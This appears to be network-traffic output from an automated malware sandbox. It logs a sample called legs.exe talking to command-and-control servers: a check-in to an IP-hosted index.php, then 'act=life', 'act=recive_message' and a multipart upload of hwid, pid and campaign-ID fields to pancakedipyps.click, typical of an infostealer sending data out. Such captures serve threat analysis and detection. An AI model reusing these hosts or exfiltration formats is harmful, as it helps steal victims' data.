                                                                                                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:30.185070038 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:30 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1 0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:31.767374039 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                                                                                                  Content-Length: 154
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 32 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E2BDD70A77B12875B35E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:31.990235090 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:31 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.449818188.114.97.34436408C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:10 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                                                                                                  2025-01-03 08:50:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                  2025-01-03 08:50:11 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:11 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=6b5kemqjirf0tm8sg2jnalgeg4; expires=Tue, 29 Apr 2025 02:36:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QwWV2LRJKWthNrvV8zSJHTszE6Nsu%2BSW0Kh42hB1wLgyF1iwC3xcthG557A1cFGU7f%2BquAi6QUi5omZ0Y7cbH%2FBTWAlbh3WroCI2oxZCA2AiSGZNfvujdTdwC%2BZHVT7jHEtIIkr7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bd62c8ba4407-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1682&rtt_var=641&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1691772&cwnd=230&unsent_bytes=0&cid=8d5685269b309411&ts=806&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                  2025-01-03 08:50:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.449826188.114.97.34436408C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 45
                                                                                                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 64 65 63 26 6a 3d
                                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=FATE99--dec&j=
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:12 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=mq7eropft965qt0l590qkhm0tq; expires=Tue, 29 Apr 2025 02:36:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNpjVFoOVl3bZq%2Fbjr731csimXjzldewdOG1%2BiIZ7TmFWE1NRTMSPJDrfLmok7Lh8nljQlOBg%2FU%2Bx%2FLRHBc%2Br72opfhhMrJRdguxbq%2Fci1j5jD13tizZO5qfUkItkRuIjW2kRX9I"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bd6a88684241-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1708&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=948&delivery_rate=1665715&cwnd=203&unsent_bytes=0&cid=b0ffa2a164f08972&ts=471&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC236INData Raw: 63 34 37 0d 0a 73 61 37 6e 52 56 61 48 41 31 73 66 2f 51 6c 4e 48 69 31 34 76 45 30 45 50 61 69 73 74 4c 4a 65 6a 4e 78 74 6a 46 7a 70 71 63 6a 4b 6a 4a 46 6e 62 4c 4d 76 65 57 79 59 4b 33 64 71 58 77 33 5a 59 53 5a 63 7a 49 36 4f 31 44 2f 67 72 77 69 67 66 70 2f 45 36 6f 76 49 68 69 6b 6c 34 69 39 35 65 6f 55 72 64 30 56 57 57 74 6b 6a 4a 67 65 4b 79 64 37 51 50 2b 43 2b 44 4f 63 7a 6d 63 57 72 32 63 4b 41 4c 54 50 6b 5a 7a 70 7a 6b 47 77 6f 65 30 77 53 30 69 52 70 56 63 57 4f 6d 4a 41 37 39 76 35 58 72 68 47 4d 33 61 6e 38 7a 35 51 75 64 50 6f 76 49 44 32 59 5a 32 38 6b 44 78 6e 5a 4c 32 68 62 7a 4d 66 63 32 6a 62 6f 76 77 6e 6d 4c 49 44 50 6f 4e 6e 4d 67 79 77 35 37 58 4d 33 65 5a 64 6e 4c 6e 46
                                                                                                                                                                                                                                                  Data Ascii: c47sa7nRVaHA1sf/QlNHi14vE0EPaistLJejNxtjFzpqcjKjJFnbLMveWyYK3dqXw3ZYSZczI6O1D/grwigfp/E6ovIhikl4i95eoUrd0VWWtkjJgeKyd7QP+C+DOczmcWr2cKALTPkZzpzkGwoe0wS0iRpVcWOmJA79v5XrhGM3an8z5QudPovID2YZ28kDxnZL2hbzMfc2jbovwnmLIDPoNnMgyw57XM3eZdnLnF
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC1369INData Raw: 4d 57 70 42 76 59 55 65 4b 6c 70 61 44 44 75 32 76 48 76 73 7a 6d 38 33 71 7a 49 4b 63 5a 7a 50 70 49 57 45 39 6c 32 63 68 65 55 77 56 32 53 35 6d 54 63 58 4f 31 64 67 30 36 72 51 41 34 54 47 46 77 61 33 62 78 59 49 6f 4d 2b 31 6e 4e 6e 37 66 4a 57 39 37 56 31 71 47 62 30 5a 50 79 63 33 43 33 53 32 75 6f 55 48 33 66 6f 7a 48 36 6f 75 4d 67 79 6b 31 36 47 45 72 64 5a 52 67 4b 6d 35 45 45 39 4d 69 5a 6c 4c 41 77 64 58 51 4f 2b 53 30 41 4f 51 36 68 73 61 73 30 38 7a 46 61 58 54 69 65 58 6b 6c 33 30 67 71 62 45 67 57 79 47 31 63 48 39 57 41 7a 35 41 37 34 76 35 58 72 6a 61 4f 79 4b 6e 59 77 34 59 76 50 2f 64 68 4b 33 75 53 62 6a 31 36 53 68 54 55 4c 48 52 56 78 4d 6a 56 32 54 66 6e 75 77 6a 71 66 73 57 4c 72 63 75 4d 33 57 63 56 36 47 6f 31 64 34 68 72 62 32
                                                                                                                                                                                                                                                  Data Ascii: MWpBvYUeKlpaDDu2vHvszm83qzIKcZzPpIWE9l2cheUwV2S5mTcXO1dg06rQA4TGFwa3bxYIoM+1nNn7fJW97V1qGb0ZPyc3C3S2uoUH3fozH6ouMgyk16GErdZRgKm5EE9MiZlLAwdXQO+S0AOQ6hsas08zFaXTieXkl30gqbEgWyG1cH9WAz5A74v5XrjaOyKnYw4YvP/dhK3uSbj16ShTULHRVxMjV2TfnuwjqfsWLrcuM3WcV6Go1d4hrb2
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC1369INData Raw: 49 33 52 54 77 4d 6a 5a 33 54 43 75 38 45 2f 70 4a 73 75 54 36 76 6e 50 6b 53 51 2b 70 31 51 36 63 35 46 73 4f 54 78 51 56 4d 64 76 59 56 4f 4b 6c 70 62 64 50 65 61 34 48 65 45 7a 69 4d 57 6b 33 4d 6d 4b 4c 7a 54 6c 62 44 78 35 6c 47 41 73 63 55 73 49 31 43 39 75 57 73 76 45 33 4a 42 79 72 72 6b 58 72 6d 62 4c 2b 72 33 59 6a 72 41 6b 4f 75 74 6d 4c 7a 32 41 4a 54 59 38 53 42 61 65 64 79 5a 53 77 73 76 54 33 7a 33 6b 73 41 72 6b 4d 6f 50 46 71 63 48 44 67 53 63 34 37 57 73 30 63 35 74 6a 4a 6e 64 45 48 4e 34 75 62 42 2b 45 6a 74 48 49 66 4c 62 2b 4f 2b 6b 79 68 73 54 6f 35 73 2b 4c 4b 54 50 7a 49 53 59 7a 68 69 73 6f 63 41 39 43 6e 69 4e 76 58 38 48 45 30 74 41 37 34 37 73 4d 36 54 32 47 7a 4b 44 64 79 34 45 72 50 65 68 6e 4f 58 71 62 62 6a 31 35 52 68 62
                                                                                                                                                                                                                                                  Data Ascii: I3RTwMjZ3TCu8E/pJsuT6vnPkSQ+p1Q6c5FsOTxQVMdvYVOKlpbdPea4HeEziMWk3MmKLzTlbDx5lGAscUsI1C9uWsvE3JByrrkXrmbL+r3YjrAkOutmLz2AJTY8SBaedyZSwsvT3z3ksArkMoPFqcHDgSc47Ws0c5tjJndEHN4ubB+EjtHIfLb+O+kyhsTo5s+LKTPzISYzhisocA9CniNvX8HE0tA747sM6T2GzKDdy4ErPehnOXqbbj15Rhb
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC176INData Raw: 64 79 4f 79 5a 34 6c 72 72 6b 44 72 6d 62 4c 77 71 50 42 77 6f 73 75 4f 65 4e 70 50 6e 4f 53 59 43 6c 33 53 42 33 59 49 6d 35 53 7a 38 33 58 31 44 62 38 76 51 54 6b 4d 34 47 4c 35 4a 50 4c 6e 57 64 73 70 55 59 31 56 49 39 77 50 57 6f 50 42 5a 41 32 4a 6c 6a 47 6a 6f 36 51 50 2b 47 33 41 4f 59 32 68 4d 53 75 33 63 71 44 4b 6a 48 71 61 79 74 31 6b 57 59 6b 63 30 51 49 33 69 4a 69 55 38 37 47 33 64 70 38 6f 50 34 49 39 6e 37 54 69 35 2f 65 77 34 55 6b 49 71 56 2b 64 32 54 66 62 43 4d 38 46 31 72 53 49 57 5a 51 78 73 4c 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: dyOyZ4lrrkDrmbLwqPBwosuOeNpPnOSYCl3SB3YIm5Sz83X1Db8vQTkM4GL5JPLnWdspUY1VI9wPWoPBZA2JljGjo6QP+G3AOY2hMSu3cqDKjHqayt1kWYkc0QI3iJiU87G3dp8oP4I9n7Ti5/ew4UkIqV+d2TfbCM8F1rSIWZQxsL
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC1369INData Raw: 33 64 34 64 0d 0a 64 32 44 33 69 73 41 6a 72 4e 34 50 44 75 4e 4c 49 6a 53 59 36 36 6d 41 39 65 4a 70 76 4b 48 68 4a 46 5a 35 68 4a 6c 6a 53 6a 6f 36 51 45 38 6d 4c 54 63 38 45 79 39 54 6b 79 6f 79 43 4b 33 53 39 49 54 56 2b 6b 32 4d 67 65 6b 59 57 31 43 5a 74 55 38 48 4b 32 74 6b 35 36 4c 38 4b 36 7a 2b 50 78 36 44 56 7a 34 59 6f 4f 2b 70 70 65 54 50 66 62 44 63 38 46 31 72 37 4f 47 31 52 7a 49 37 4a 6e 69 57 75 75 51 4f 75 5a 73 76 48 6f 39 58 4b 67 43 73 31 34 32 6b 38 64 5a 74 71 4b 58 70 4d 46 64 6f 71 5a 31 44 4f 77 74 6a 61 50 65 2b 79 42 4f 45 31 6a 6f 76 6b 6b 38 75 64 5a 32 79 6c 55 44 70 72 69 48 73 6a 50 46 42 55 78 32 39 68 55 34 71 57 6c 74 45 75 35 4c 51 42 36 7a 47 4f 79 4b 58 55 77 59 4d 72 50 75 78 70 50 33 4b 57 65 53 78 77 51 52 33 51
                                                                                                                                                                                                                                                  Data Ascii: 3d4dd2D3isAjrN4PDuNLIjSY66mA9eJpvKHhJFZ5hJljSjo6QE8mLTc8Ey9TkyoyCK3S9ITV+k2MgekYW1CZtU8HK2tk56L8K6z+Px6DVz4YoO+ppeTPfbDc8F1r7OG1RzI7JniWuuQOuZsvHo9XKgCs142k8dZtqKXpMFdoqZ1DOwtjaPe+yBOE1jovkk8udZ2ylUDpriHsjPFBUx29hU4qWltEu5LQB6zGOyKXUwYMrPuxpP3KWeSxwQR3Q
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC1369INData Raw: 6a 42 30 64 63 31 35 61 77 46 36 54 6d 41 77 36 48 63 79 70 63 72 4f 76 64 6b 4b 32 2f 66 4a 57 39 37 56 31 71 47 62 31 42 59 32 74 37 56 6b 67 33 34 76 52 6e 6c 4d 34 65 4c 74 5a 33 56 78 53 41 34 70 54 6c 35 65 35 42 69 4c 48 4e 4f 45 39 49 69 59 31 62 50 7a 39 44 55 4e 75 53 2b 43 65 67 2f 6a 73 47 70 30 73 61 4d 49 44 7a 69 59 69 73 39 30 53 73 6f 5a 41 39 43 6e 67 5a 68 54 63 54 65 6c 73 39 79 39 2f 34 49 34 6e 37 54 69 36 37 5a 77 34 45 67 4f 4f 4e 6b 50 33 43 65 5a 43 35 38 51 42 37 56 4a 6d 42 65 78 38 76 62 31 43 37 6b 74 51 44 69 4e 34 66 47 36 70 32 4d 67 6a 39 30 76 53 45 49 63 4a 46 6c 4b 47 6f 50 42 5a 41 32 4a 6c 6a 47 6a 6f 36 51 50 65 4b 78 44 4f 45 39 69 4d 71 67 77 64 36 4a 4c 6a 7a 67 62 54 4a 7a 6d 58 6b 70 63 30 59 5a 33 53 5a 68 56
                                                                                                                                                                                                                                                  Data Ascii: jB0dc15awF6TmAw6HcypcrOvdkK2/fJW97V1qGb1BY2t7Vkg34vRnlM4eLtZ3VxSA4pTl5e5BiLHNOE9IiY1bPz9DUNuS+Ceg/jsGp0saMIDziYis90SsoZA9CngZhTcTels9y9/4I4n7Ti67Zw4EgOONkP3CeZC58QB7VJmBex8vb1C7ktQDiN4fG6p2Mgj90vSEIcJFlKGoPBZA2JljGjo6QPeKxDOE9iMqgwd6JLjzgbTJzmXkpc0YZ3SZhV
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC1369INData Raw: 42 4f 2f 2f 2b 56 2f 67 75 6e 4d 79 31 6e 64 58 46 49 44 69 6c 4f 58 6c 37 6c 6d 30 6f 65 6b 45 49 32 79 6c 70 55 4d 50 48 30 74 67 2f 37 72 6f 4c 36 54 75 49 78 36 48 55 7a 34 6f 6a 50 65 74 6f 4e 6a 33 52 4b 79 68 6b 44 30 4b 65 44 6e 31 63 78 73 4f 57 7a 33 4c 33 2f 67 6a 69 66 74 4f 4c 70 74 33 4a 68 53 30 79 34 57 51 2f 64 35 70 72 4a 48 39 41 48 74 67 72 61 56 2f 42 78 39 66 57 4f 65 53 31 43 65 4d 39 6a 63 33 71 6e 59 79 43 50 33 53 39 49 52 6c 6d 6b 6d 63 6f 50 46 42 55 78 32 39 68 55 34 71 57 6c 74 73 77 36 72 6b 50 34 7a 32 44 7a 71 37 5a 79 59 55 76 4a 75 31 68 50 6d 2b 4e 61 79 5a 35 51 78 6e 65 4b 32 42 57 7a 4d 33 53 6b 48 4b 75 75 52 65 75 5a 73 76 6d 70 74 54 6c 67 6a 78 30 2b 69 38 67 50 5a 68 6e 62 79 51 50 47 39 55 6c 61 56 4c 4a 79 4e
                                                                                                                                                                                                                                                  Data Ascii: BO//+V/gunMy1ndXFIDilOXl7lm0oekEI2ylpUMPH0tg/7roL6TuIx6HUz4ojPetoNj3RKyhkD0KeDn1cxsOWz3L3/gjiftOLpt3JhS0y4WQ/d5prJH9AHtgraV/Bx9fWOeS1CeM9jc3qnYyCP3S9IRlmkmcoPFBUx29hU4qWltsw6rkP4z2Dzq7ZyYUvJu1hPm+NayZ5QxneK2BWzM3SkHKuuReuZsvmptTlgjx0+i8gPZhnbyQPG9UlaVLJyN
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC1369INData Raw: 35 6a 62 33 66 70 32 4c 38 6f 47 43 78 54 56 30 76 53 46 2b 66 6f 31 35 4b 58 39 5a 47 5a 6b 52 57 48 6a 63 78 4e 48 41 4f 2f 6d 78 54 36 42 2b 68 49 76 79 36 6f 79 4d 49 43 2f 30 64 7a 52 74 6d 43 73 51 4d 67 38 43 6e 6e 63 6d 61 73 6e 41 32 4e 63 71 2f 2f 4d 6f 2b 44 53 4d 32 36 33 45 77 38 56 70 64 4f 4d 68 59 53 37 52 4b 79 74 74 44 30 4b 4f 66 54 30 4b 6d 5a 6d 47 67 69 4f 67 70 30 2f 34 66 74 4f 5a 35 4a 50 65 78 58 39 30 6f 6d 49 72 62 35 6c 6f 4f 58 38 49 4a 4f 41 49 66 46 4c 4d 32 63 66 75 41 75 6d 6b 41 75 67 70 6d 6f 65 2f 30 4d 4b 4c 49 43 4b 6c 4c 33 6c 79 33 7a 4d 57 50 41 64 61 34 57 45 6d 52 34 71 57 6c 75 55 2f 34 4c 41 49 2b 43 2f 47 37 4c 44 65 79 70 49 32 64 4b 73 68 50 7a 33 48 4f 57 45 38 53 77 75 65 64 7a 59 4e 6b 5a 75 46 68 32 79
                                                                                                                                                                                                                                                  Data Ascii: 5jb3fp2L8oGCxTV0vSF+fo15KX9ZGZkRWHjcxNHAO/mxT6B+hIvy6oyMIC/0dzRtmCsQMg8CnncmasnA2Ncq//Mo+DSM263Ew8VpdOMhYS7RKyttD0KOfT0KmZmGgiOgp0/4ftOZ5JPexX90omIrb5loOX8IJOAIfFLM2cfuAumkAugpmoe/0MKLICKlL3ly3zMWPAda4WEmR4qWluU/4LAI+C/G7LDeypI2dKshPz3HOWE8SwuedzYNkZuFh2y
                                                                                                                                                                                                                                                  2025-01-03 08:50:12 UTC1369INData Raw: 67 66 4c 67 2b 72 73 67 73 55 2f 64 4c 30 68 44 48 36 52 5a 53 68 71 58 6c 66 32 44 46 78 6c 69 4f 4c 52 78 58 37 61 75 52 2f 2f 4e 59 62 48 36 70 32 4d 67 32 64 73 74 53 39 35 65 59 34 72 64 79 77 64 51 59 74 38 4d 51 2b 59 30 5a 6a 4a 66 50 6a 2b 56 37 78 77 79 39 6e 71 69 34 7a 43 4a 43 62 33 5a 7a 70 72 6e 43 77 52 51 6d 67 55 32 53 35 77 54 39 33 42 36 4f 34 70 37 62 41 42 36 53 69 61 69 2b 53 54 77 38 56 2f 44 61 55 70 65 55 4c 52 4b 7a 63 38 46 31 72 72 4c 47 68 52 7a 64 6a 48 6e 52 76 67 75 51 37 34 4c 70 7a 45 36 70 32 4d 67 32 64 73 74 79 39 35 65 59 34 72 64 79 77 64 51 59 74 38 4d 51 2b 59 30 5a 6a 4a 66 50 6a 2b 56 37 78 77 79 39 6e 71 69 34 7a 43 4a 43 62 33 5a 7a 70 72 6e 43 77 52 51 6d 67 55 32 53 35 77 54 39 33 42 6d 66 34 4b 7a 34 41 78
                                                                                                                                                                                                                                                  Data Ascii: gfLg+rsgsU/dL0hDH6RZShqXlf2DFxliOLRxX7auR//NYbH6p2Mg2dstS95eY4rdywdQYt8MQ+Y0ZjJfPj+V7xwy9nqi4zCJCb3ZzprnCwRQmgU2S5wT93B6O4p7bAB6Siai+STw8V/DaUpeULRKzc8F1rrLGhRzdjHnRvguQ74LpzE6p2Mg2dsty95eY4rdywdQYt8MQ+Y0ZjJfPj+V7xwy9nqi4zCJCb3ZzprnCwRQmgU2S5wT93Bmf4Kz4Ax


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.449837188.114.97.34436408C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:13 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=D8GD2V6WTPW
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 18119
                                                                                                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                                                                                                  2025-01-03 08:50:13 UTC15331OUTData Raw: 2d 2d 44 38 47 44 32 56 36 57 54 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 38 47 44 32 56 36 57 54 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 38 47 44 32 56 36 57 54 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 64 65 63 0d 0a 2d 2d 44 38 47 44 32 56 36 57 54 50 57 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                                                                  Data Ascii: --D8GD2V6WTPWContent-Disposition: form-data; name="hwid"F9C89AE3A748EEF1AC8923850305D13E--D8GD2V6WTPWContent-Disposition: form-data; name="pid"2--D8GD2V6WTPWContent-Disposition: form-data; name="lid"FATE99--dec--D8GD2V6WTPWConten
                                                                                                                                                                                                                                                  2025-01-03 08:50:13 UTC2788OUTData Raw: e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab
                                                                                                                                                                                                                                                  Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                                                                                                                                                                  2025-01-03 08:50:14 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:14 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=csiv6n2o474snjffb8go56g54j; expires=Tue, 29 Apr 2025 02:36:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
